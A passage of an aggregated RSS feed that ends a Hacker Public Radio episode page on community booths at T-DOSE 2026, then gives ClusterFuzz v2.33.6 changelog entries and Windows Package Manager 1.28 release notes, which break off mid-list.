Ready to serve sandwitches, sell T-Shirts, Magic Mugs, and <a href="https://www.club-mate.de/en/" rel="noopener noreferrer" target="_blank">
club-mate</a>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_5.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_5_tn.jpeg">
</a>

</p>

<p>
T-Shirts</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_6.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_6_tn.jpeg">
</a>

</p>

<p>

<a href="https://www.club-mate.de/en/" rel="noopener noreferrer" target="_blank">
club-mate</a>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_7.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_7_tn.jpeg">
</a>

</p>

<p>
Magic Mugs</p>

<h2>Hackalot</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=639.720000,1320.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=639.720000,1320.720000" type="audio/mpeg">
</audio>
</p>



<p>
Hackalot is the Eindhoven and surrounding area hackerspace. A hackerspace is a place where hackers can work on their own or collaborative projects. You can work and talk together, but you can also do your own thing. Together we can also purchase a lot of cooler tools such as lasercutters and 3d printers. Often there is no suitable place for equipment at home. So if you know someone, you are either an electronics/computer/technical hobby that got out of hand, come on by!</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_8.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_8_tn.jpeg">
</a>

</p>

<p>
Boekenwuurm at the Hackalot stand.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_9.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_9_tn.jpeg">
</a>

</p>

<p>
The Hackalot stand.</p>

<ul>

<li>

<a href="https://hsnl.social/@boekenwuurm" rel="noopener noreferrer" target="_blank">
Boekenwuurm@hsnl.social</a>

</li>

<li>

<a href="https://boekenwuurm.nl/" rel="noopener noreferrer" target="_blank">
boekenwuurm.nl</a>

</li>

<li>

<a href="https://hackalot.nl/" rel="noopener noreferrer" target="_blank">
Hackalot</a>

</li>

</ul>

<h2>Laptop Revive</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=1320.720000,1824.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=1320.720000,1824.720000" type="audio/mpeg">
</audio>
</p>

<p>
Laptop Revive collects discarded laptops, that are still working. We then install Linux Mint to provide a working laptops to students who cannot afford laptops. We are socially involved, sustainable and open.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_10.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_10_tn.jpeg">
</a>

</p>

<p>
Alex Kok Laptop Revive</p>

<ul>

<li>

<a href="https://www.laptoprevive.nl/" rel="noopener noreferrer" target="_blank">
Laptop Revive</a>

</li>

</ul>

<h2>Free Software Foundation Europe</h2>

<p>
Free Software Foundation Europe (FSFE) information booth, with information material, stickers and merchandise.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_11.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_11_tn.jpeg">
</a>

</p>

<p>
Nico was so busy that we were unable to snag an interview this time. However check out our talk with him at the <a href="https://hackerpublicradio.org/eps/hpr4639/index.html" rel="noopener noreferrer" target="_blank">
NLUUG Spring Conference 2026</a>
.</p>

<ul>

<li>

<a href="https://fsfe.org/index.en.html" rel="noopener noreferrer" target="_blank">
Free Software Foundation Europe</a>

</li>

</ul>

<h2>Doeidag and Banray</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=1824.720000,2330.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=1824.720000,2330.720000" type="audio/mpeg">
</audio>
</p>

<p>
We also interviewed Geert-Jan Meewisse in <a href="https://hackerpublicradio.org/eps/hpr4639/index.html" rel="noopener noreferrer" target="_blank">
hpr4639 :: NLUUG Spring Conference 2026</a>
but this time he is here talking about <a href="https://banray.eu/en/index.html" rel="noopener noreferrer" target="_blank">
banray.eu</a>

</p>

<blockquote>
In 2025, Meta sold over seven million pairs of camera-equipped glasses that look like regular Ray-Bans. The person wearing them looks like anyone else. But these people are now products, as is everyone they interact with.</blockquote>

<p>
He then also mentioned the <a href="https://doeidag.nl/" rel="noopener noreferrer" target="_blank">
Doeidag</a>
project where they encourage people to drop one service at a time on the first Sunday of the month</p>

<ul>

<li>

<a href="https://doeidag.nl/" rel="noopener noreferrer" target="_blank">
https://doeidag.nl/</a>

</li>

<li>

<a href="https://banray.eu/en/index.html" rel="noopener noreferrer" target="_blank">
https://banray.eu/</a>

</li>

</ul>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_12.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_12_tn.jpeg">
</a>

</p>

<p>
Geert-Jan Meewisse Doeidag and Banray</p>

<h2>Debian</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=2330.720000,2660.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=2330.720000,2660.720000" type="audio/mpeg">
</audio>
</p>

<p>
The Debian Project is an association of Free Software developers who volunteer their time and effort in order to produce the completely free operating system Debian.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_13.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_13_tn.jpeg">
</a>

</p>

<p>
Ken Talks to Joost van Baal Llić from the Debian Project</p>

<p>

<a href="https://www.debian.org/" rel="noopener noreferrer" target="_blank">
Debian</a>

</p>

<h2>Angry Nerds Podcast</h2>

<p>
Angry Nerds, met extra cyber!</p>

<p>
The Angry Nerds is a Dutch Language podcast about privacy and security</p>

<p>
It's a live show that is topical and often humorous tech podcast where a group of enthusiastic nerds discusses current technology, IT and cybersecurity topics. The hosts combine technical depth with background conversations, humor and the occasionally a good dose of cynicism. Expect conversations about everything from network infrastructures to software development, from privacy issues to bizarre tech trends.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_14.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_14_tn.jpeg">
</a>

</p>

<p>
Ken on the Angry Nerds Podcast</p>

<p>You can listen to the recording at <a href="https://makertube.net/w/6M6VumLCH99mN3y1dZjRz9?start=1h16m11s">Angry Nerds op T-DOSE 2026 deel 2 (prikkelarme versie)</a>.</p>

<ul>

<li>

<a href="https://angrynerdspodcast.nl/" rel="noopener noreferrer" target="_blank">
Angry Nerds Podcast</a>

</li>

</ul>

<h2>Freie Software Freunde - Free Your Model Train</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=2660.720000,3279.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=2660.720000,3279.720000" type="audio/mpeg">
</audio>
</p>

<p>
We are a non-profit organization. We are committed to Free Software and Open Standards. Software is not just technology, it's an important part of our daily life.</p>

<p>
We want to raise awareness of the importance of Free Software and Open Standards. That is why we are concerned with topics outside of technology: politics, education, ethics, psychology, ecology and economics, licenses, ... One of our projects is "Free your model train". Our goal is to raise awareness of the benefits of open standards.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_15.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_15_tn.jpeg">
</a>

</p>

<p>
Birgit Hücking (@akkolady) standing at the <a href="http://freie-software.org/" rel="noopener noreferrer" target="_blank">
freie-software.org</a>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_16.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_16_tn.jpeg">
</a>

</p>

<p>
The <a href="http://freie-software.org/" rel="noopener noreferrer" target="_blank">
freie-software.org</a>
table with two large train loops, a smaller internal one. Two knitted Tux Mascots. And a lot of information.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_17.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_17_tn.jpeg">
</a>
Close up of the two knitted Tux Mascot.</p>

<ul>
<li><a href="https://chaos.social/@akkolady" rel="noopener noreferrer" target="_blank">@akkolady@chaos.social</a></li>
<li><a href="https://mastodon.social/@FreieSoftwareFreunde" rel="noopener noreferrer" target="_blank">@FreieSoftwareFreunde@mastodon.social</a></li>
<li><a href="https://freie-software.org/" rel="noopener noreferrer" target="_blank">Freie Software Freunde</a></li>
<li><a href="https://freie-software.org/?Projekte___Free_Your_Model_Train" rel="noopener noreferrer" target="_blank">Free Your Model Train</a></li>
<li><a href="https://fymt.de/" rel="noopener noreferrer" target="_blank">https://fymt.de</a></li>

</ul>

<h2>Hacker Public Radio: The community Podcast</h2>

<blockquote>
Hacker Public Radio is a technology focused podcast that releases shows every weekday Monday to Friday. Our shows are created by people like you, and can be on any topic that is of interest to hackers, hobbyists, makers, etc. We are a welcoming community that offers positive feedback and encourages respectful debate. This is our 21st year of operation, and we will release our 5,000th show in August. Everything we do is released under a Free Culture License. We do not vet, edit, moderate or in any way censor any of the audio you submit, we trust you to do that. We will be available to guide you in sharing your knowledge with the community. Having had a stand at FOSDEM (BE), OggCamp(UK), Linux Fest North West(US), Spectrum (FR), we are available to show you how easy podcasting can be. We will be answering your questions, and conducting interviews with anyone with anything interesting to say.</blockquote>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_18.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_18_tn.jpeg">
</a>

</p>

<p>
The HPR booth.</p>

<ul>

<li>

<a href="https://hackerpublicradio.org/" rel="noopener noreferrer" target="_blank">
Hacker Public Radio</a>

</li>

</ul>

<h2>UBports</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=3279.720000,4060.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=3279.720000,4060.720000" type="audio/mpeg">
</audio>
</p>

<blockquote>
We are developing an open source Linux mobile OS built to be your daily driver... ...and we'd like to welcome you to our community.</blockquote>

<p>
Next up is a chat with Sander Klootwijk about UBports and Ubuntu Touch. Their website has a list of <a href="https://devices.ubuntu-touch.io/" rel="noopener noreferrer" target="_blank">
supported devices</a>
.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_19.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_19_tn.jpeg">
</a>

</p>

<p>
We talk with Sander Klootwijk</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_20.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_20_tn.jpeg">
</a>

</p>

<p>
Proof it's running on actual hardware</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_21.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_21_tn.jpeg">
</a>

</p>

<p>
Yumi The UBports Installer Mascot was not available for comment.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_22.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_22_tn.jpeg">
</a>

</p>

<p>
Ubuntu Touch on a Fairphone</p>

<ul>

<li>

<a href="https://mastodon.social/@BallonQuartier@mastodon.nl" rel="noopener noreferrer" target="_blank">
@BallonQuartier@mastodon.nl</a>

</li>

<li>

<a href="https://ubports.com/en/" rel="noopener noreferrer" target="_blank">
UBports</a>

</li>

<li>

<a href="https://devices.ubuntu-touch.io/" rel="noopener noreferrer" target="_blank">
https://devices.ubuntu-touch.io/</a>

</li>

</ul>

<h2>Adfinis</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=4060.720000,4688.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=4060.720000,4688.720000" type="audio/mpeg">
</audio>
</p>

<blockquote>
Accelerate your business with open source-driven automation, security, cloud, and DevSecOps solutions from Adfinis, your end-to-end partner for robust, flexible IT that drives growth and innovation at any scale. Welcome to Our World Full of Open Source</blockquote>

<blockquote>
At Adfinis, we believe in the transformative power of open source technology to foster innovation, transparency, and collaboration. We are committed to providing solutions free from vendor lock-in, ensuring our clients retain full control and flexibility over their systems. Digital sustainability lies at the heart of our approach, as we strive to create technologies that not only serve the present but also support a long-term, environmentally responsible future. Additionally, we champion digital sovereignty, empowering organizations and communities to own and control their data, infrastructure, and technological destiny. These principles drive us to build a more open, sustainable, and inclusive digital world.</blockquote>

<p>
Finally we chat to <a href="mailto:Coen.hamers@adfinis.com" rel="noopener noreferrer" target="_blank">
Coen hamers</a>
, <a href="mailto:Robert.debock@adfinis.com" rel="noopener noreferrer" target="_blank">
Robert de Bock</a>
, and <a href="mailto:annebelle.vanwaardenburg@adfinis.com" rel="noopener noreferrer" target="_blank">
Annebelle van Waardenburg</a>
from <a href="https://www.adfinis.com/" rel="noopener noreferrer" target="_blank">
Adfinis</a>
whose sponsorship made the event possible.</p>
<p>
</p><ul>
<li><a href="https://www.adfinis.com/en/solutions" rel="noopener noreferrer" target="_blank">https://www.adfinis.com/en/solutions</a></li>
<li><a href="https://www.adfinis.com/en/career" rel="noopener noreferrer" target="_blank">https://www.adfinis.com/en/career</a></li>
</ul>


<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_23.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_23_tn.jpeg">
</a>

</p>

<h2>Credits</h2>

<ul>
<li><a href="https://freesound.org/people/jzielke011/sounds/439690/">Record Needle Rip</a></li>
<li><a href="https://archive.org/details/FreeSoftwareSong_131">Free Software Song</a></li>
</ul>


<p><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.33.6]]></title>
<description><![CDATA[What's Changed

[Swarming] Crash service on startup  by @IvanBM18 in #5285
Remove blackbox fuzzing debug logs by @PauloVLB in #5316
Revert "Defer fuzzer logs to postprocess (#5311)" by @PauloVLB in #5322
[Swarming] Adds Response proto & discards tasks with missing dimensions by @IvanBM18 in #5289...]]></description>
<link>https://tsecurity.de/de/3602824/it-security-tools/v2336/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602824/it-security-tools/v2336/</guid>
<pubDate>Tue, 16 Jun 2026 20:04:31 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>[Swarming] Crash service on startup  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IvanBM18/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IvanBM18">@IvanBM18</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4482042222" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5285" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5285/hovercard" href="https://github.com/google/clusterfuzz/pull/5285">#5285</a></li>
<li>Remove blackbox fuzzing debug logs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PauloVLB/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PauloVLB">@PauloVLB</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634429713" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5316" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5316/hovercard" href="https://github.com/google/clusterfuzz/pull/5316">#5316</a></li>
<li>Revert "Defer fuzzer logs to postprocess (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4582383916" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5311" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5311/hovercard" href="https://github.com/google/clusterfuzz/pull/5311">#5311</a>)" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PauloVLB/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PauloVLB">@PauloVLB</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665400673" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5322" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5322/hovercard" href="https://github.com/google/clusterfuzz/pull/5322">#5322</a></li>
<li>[Swarming] Adds Response proto &amp; discards tasks with missing dimensions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IvanBM18/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IvanBM18">@IvanBM18</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497224704" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5289" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5289/hovercard" href="https://github.com/google/clusterfuzz/pull/5289">#5289</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google/clusterfuzz/compare/v2.33.5...v2.33.6"><tt>v2.33.5...v2.33.6</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.28.220]]></title>
<description><![CDATA[This is a release candidate of Windows Package Manager v1.28. If you find any bugs or problems, please help us out by filing an issue.
New in v1.28

Bumped the winget version to 1.28 to match the package version.
Additional options for limiting the size of log files.

New Feature: 'source edit'
N...]]></description>
<link>https://tsecurity.de/de/3601259/downloads/windows-package-manager-128220/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601259/downloads/windows-package-manager-128220/</guid>
<pubDate>Tue, 16 Jun 2026 11:31:56 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a release candidate of Windows Package Manager v1.28. If you find any bugs or problems, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<h2>New in v1.28</h2>
<ul>
<li>Bumped the winget version to 1.28 to match the package version.</li>
<li>Additional <a href="https://github.com/microsoft/winget-cli/blob/master/doc/Settings.md#file">options for limiting the size of log files</a>.</li>
</ul>
<h1>New Feature: 'source edit'</h1>
<p>New feature that adds an 'edit' subcommand to the 'source' command. This can be used to set an explicit source to be implicit and vice-versa. For example, with this feature you can make the 'winget-font' source an implicit source instead of explicit source.</p>
<p>To use the feature, try <code>winget source edit winget-font</code> to set the Explicit state to the default.</p>
<h1>New Experimental Feature: 'listDetails'</h1>
<p>The new experimental feature <code>listDetails</code> enables a new option for the <code>list</code> command, <code>--details</code>.  When supplied, the output is no longer a table view of the results but is instead a series of <code>show</code> like outputs drawing data from the installed item.</p>
<p>An example output for a single installed package is:</p>
<div class="highlight highlight-source-powershell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="&gt; wingetdev list Microsoft.VisualStudio.2022.Enterprise --details
Visual Studio Enterprise 2022 [Microsoft.VisualStudio.2022.Enterprise]
Version: 17.14.21 (November 2025)
Publisher: Microsoft Corporation
Local Identifier: ARP\Machine\X86\875fed29
Product Code: 875fed29
Installer Category: exe
Installed Scope: Machine
Installed Location: C:\Program Files\Microsoft Visual Studio\2022\Enterprise
Available Upgrades:
  winget [17.14.23]"><pre><span class="pl-k">&gt;</span> wingetdev list Microsoft.VisualStudio.<span class="pl-c1">2022.</span>Enterprise <span class="pl-k">--</span>details
Visual Studio Enterprise <span class="pl-c1">2022</span> [<span class="pl-k">Microsoft.VisualStudio.2022.Enterprise</span>]
Version: <span class="pl-c1">17.14</span>.<span class="pl-c1">21</span> (November <span class="pl-c1">2025</span>)
Publisher: Microsoft Corporation
Local Identifier: ARP\Machine\X86\875fed29
Product Code: 875fed29
Installer Category: exe
Installed Scope: Machine
Installed Location: C:\Program Files\Microsoft Visual Studio\<span class="pl-c1">2022</span>\Enterprise
Available Upgrades:
  winget [<span class="pl-c1">17.14</span>.<span class="pl-c1">23</span>]</pre></div>
<p>If sixels are enabled and supported by the terminal, an icon for the installed package will be shown.</p>
<p>To enable this feature, add the 'listDetails' experimental feature to your settings.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='"experimentalFeatures": {
    "listDetails": true
},'><pre class="notranslate"><code>"experimentalFeatures": {
    "listDetails": true
},
</code></pre></div>
<h2>Bug Fixes</h2>
<ul>
<li>Portable Packages now use the correct directory separators regardless of which convention is used in the manifest</li>
<li><code>--suppress-initial-details</code> now works with <code>winget configure test</code></li>
<li><code>--suppress-initial-details</code> no longer requires <code>--accept-configuration-agreements</code></li>
<li>Corrected property of <code>Font</code> experimental feature to accurately reflect <code>fonts</code> as the required setting value</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>Update the other TDBuild task by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3151652738" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5534" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5534/hovercard" href="https://github.com/microsoft/winget-cli/pull/5534">#5534</a></li>
<li>Use windows-latest agents in localization pipeline by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3154579970" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5538" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5538/hovercard" href="https://github.com/microsoft/winget-cli/pull/5538">#5538</a></li>
<li>Bump version to v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3151371086" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5532" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5532/hovercard" href="https://github.com/microsoft/winget-cli/pull/5532">#5532</a></li>
<li>Allow set foreground from PS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3154984365" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5541" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5541/hovercard" href="https://github.com/microsoft/winget-cli/pull/5541">#5541</a></li>
<li>Move to proper signal for dev/not-dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3169763143" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5552" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5552/hovercard" href="https://github.com/microsoft/winget-cli/pull/5552">#5552</a></li>
<li>Use SDK 26100 in CommonCore project by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3200120927" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5570" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5570/hovercard" href="https://github.com/microsoft/winget-cli/pull/5570">#5570</a></li>
<li>Repair Repair-WinGetPackageManager by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3197628230" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5568" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5568/hovercard" href="https://github.com/microsoft/winget-cli/pull/5568">#5568</a></li>
<li>Use cpprestsdk v2.10.18 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3197577111" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5567" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5567/hovercard" href="https://github.com/microsoft/winget-cli/pull/5567">#5567</a></li>
<li>Undefined-behaviour fix: safely call std::isspace in CompletionData by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mohiuddin-khan-shiam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mohiuddin-khan-shiam">@mohiuddin-khan-shiam</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3186146724" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5564" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5564/hovercard" href="https://github.com/microsoft/winget-cli/pull/5564">#5564</a></li>
<li>Add missing compilation flags for vcpkg ports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3224397023" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5587" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5587/hovercard" href="https://github.com/microsoft/winget-cli/pull/5587">#5587</a></li>
<li>Add more missing flags for vcpkg by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3237619990" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5592" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5592/hovercard" href="https://github.com/microsoft/winget-cli/pull/5592">#5592</a></li>
<li>Swallow provisioned package errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3240833652" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5595" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5595/hovercard" href="https://github.com/microsoft/winget-cli/pull/5595">#5595</a></li>
<li>Update detours vcpkg to use prior version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3244916547" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5601" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5601/hovercard" href="https://github.com/microsoft/winget-cli/pull/5601">#5601</a></li>
